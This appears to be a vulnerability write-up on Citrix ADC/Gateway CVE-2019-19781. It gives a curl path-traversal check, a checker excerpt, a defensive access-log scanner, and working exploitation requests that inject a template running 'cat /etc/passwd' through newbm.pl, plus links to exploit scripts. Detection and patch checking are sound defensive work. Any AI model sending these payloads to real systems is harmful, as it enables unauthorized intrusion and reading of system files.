### Citrix Gateway/ADC Remote Code Execution Vulnerability - nuoyan
1、Affected versions
Citrix NetScaler ADC and NetScaler Gateway version 10.5
Citrix ADC and NetScaler Gateway version 11.1, 12.0, 12.1
Citrix ADC and Citrix Gateway version 13.0
2、Detection procedure
Send the request below with curl and inspect the response: a 200 response with the contents of smb.conf means the target may be vulnerable.
```bash
curl https://host/vpn/../vpns/cfg/smb.conf --path-as-is
#response
[global]
encrypt passwords = yes
name resolve order = lmhosts wins host bcast
```
In real testing you will inevitably run into HTTPS certificate problems, and if the target is not vulnerable the command above prints nothing at all. Add -k to skip certificate verification and use -I to return only the response headers (-i returns headers plus body); a 403, as below, means the patch has been applied.
```bash
curl https://host/vpn/../vpns/cfg/smb.conf --path-as-is -k -I
#response
HTTP/1.1 403 Forbidden
```
3、Automated script
Download: https://github.com/trustedsec/cve-2019-19781
```python
# Excerpt from the trustedsec checker. The function wrapper and its parameter
# names are assumed here so the excerpt is self-contained: `req` is the
# requests.Response for /vpn/../vpns/cfg/smb.conf and `target` is the host.
def check_response(req, target, vulnServers, verbose=False):
    # if the system is still vulnerable
    if ("[global]") in str(req.content) and ("encrypt passwords") in str(req.content) and (
            "name resolve order") in str(req.content):  # each smb.conf will contain a [global] variable
        print("[\033[91m!\033[0m] This Citrix ADC Server: %s is still vulnerable to CVE-2019-19781." % (target))
        vulnServers.append(target)
        return 1
    # if the system responds with a Citrix message (fixed) or a 403 (fixed)
    elif ("Citrix") in str(req.content) or "403" in str(req.status_code):  # only seen if system is not vulnerable
        print(
            "[\033[92m*\033[0m] Server: %s responded with a 403. If this is a Citrix Server, it is not vulnerable. Awesome!" % (
                target))
    # if we run into something other than Citrix
    else:
        if verbose == True: print("[-] Server %s does not appear to be a Citrix server." % (target))
        pass
```
The script uses the same logic as the manual check: a 403 (or a page mentioning "Citrix") is judged patched outright, and any other response is judged not to be a Citrix server.
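On the defensive side, the same `/vpn/../vpns/` traversal that the manual check and the script look for is also the signature to hunt in the access logs of a reverse proxy or WAF in front of the gateway. The following is an added example, not part of the original post or the trustedsec script; the combined log format, the constructed sample lines and the verdict labels are assumptions, and the status-based verdicts are heuristics to prioritise investigation, not proof of compromise.

```python
import re
from urllib.parse import unquote

# The traversal used by both the manual check and the exploit requests:
# a path under /vpn/ that escapes with ".." into /vpns/.
TRAVERSAL = re.compile(r"/vpn/.*?\.\./.*?vpns/", re.IGNORECASE)

# Combined log format (assumed): ip ident user [ts] "METHOD path proto" status size ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+'
)

def normalize(path):
    """Decode percent-encoding twice so %2e%2e and %252e%252e both become '..'."""
    return unquote(unquote(path))

def classify(method, path, status):
    """Return None for requests without the traversal, else a verdict label."""
    p = normalize(path)
    if not TRAVERSAL.search(p):
        return None
    if status == 403:
        return "blocked"          # mitigation or patch rejected the traversal
    if method == "POST" and "newbm.pl" in p:
        return "exploit-attempt"  # template write via newbm.pl, see section 4
    if status == 200:
        return "probe-success"    # e.g. smb.conf was served: host likely unpatched
    return "probe"                # traversal seen but 404/other: check the source IP

def scan_log(lines):
    """Parse access-log lines; return (ip, path, status, verdict) for each hit."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if m is None:
            continue
        verdict = classify(m["method"], m["path"], int(m["status"]))
        if verdict:
            hits.append((m["ip"], m["path"], int(m["status"]), verdict))
    return hits

# Constructed sample lines (not from any real system).
SAMPLE_LOG = [
    '203.0.113.5 - - [11/Jan/2020:10:00:01 +0000] "GET /vpn/../vpns/cfg/smb.conf HTTP/1.1" 200 113 "-" "curl/7.64.0"',
    '203.0.113.5 - - [11/Jan/2020:10:00:02 +0000] "POST /vpn/../vpns/portal/scripts/newbm.pl HTTP/1.1" 200 141 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [11/Jan/2020:10:00:03 +0000] "GET /vpn/%2e%2e/vpns/cfg/smb.conf HTTP/1.1" 403 0 "-" "python-requests/2.22"',
    '192.0.2.9 - - [11/Jan/2020:10:00:04 +0000] "GET /vpn/index.html HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
]
```

Run `scan_log(SAMPLE_LOG)` over real log lines to get one tuple per suspicious request; the double decode matters because the Citrix responder rule that blocks this traversal can be bypassed in logs that store the raw encoded path.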
4、Exploitation process
Send a POST request:
```http
POST /vpn/../vpns/portal/scripts/newbm.pl HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0) Gecko/20100101 Firefox/75.0
NSC_USER: ../../../netscaler/portal/templates/jk666
NSC_NONCE: nsroot
Content-Length: 96

url=127.0.0.1&title=[% template.new('BLOCK' = 'print `cat /etc/passwd`') %]&desc=desc&UI_inuse=a
```
Being at risk does not mean being exploitable: newbm.pl may have been deleted or renamed, and in real engagements we did run into 404 responses. The response body of a successful upload looks like this:
```http
HTTP/1.1 200 OK

<HTML>
<BODY>
<SCRIPT language=javascript type=text/javascript>
//parent.window.ns_reload();
window.close();
</SCRIPT>
</BODY>
</HTML>
```
For other exploitation points, see the article by 小胖虎 at https://www.freebuf.com/news/232752.html; those require writing the PoC into a file name and can be affected by special characters, so overall they are less reliable than newbm.pl.
The template written above is then fetched with a GET request:
```http
GET /vpn/../vpns/portal/jk666.xml HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0) Gecko/20100101 Firefox/75.0
NSC_USER: nsroot
NSC_NONCE: nsroot
```
Automated exploitation scripts are also available:
https://github.com/jas502n/CVE-2019-19781
https://github.com/projectzeroindia/CVE-2019-19781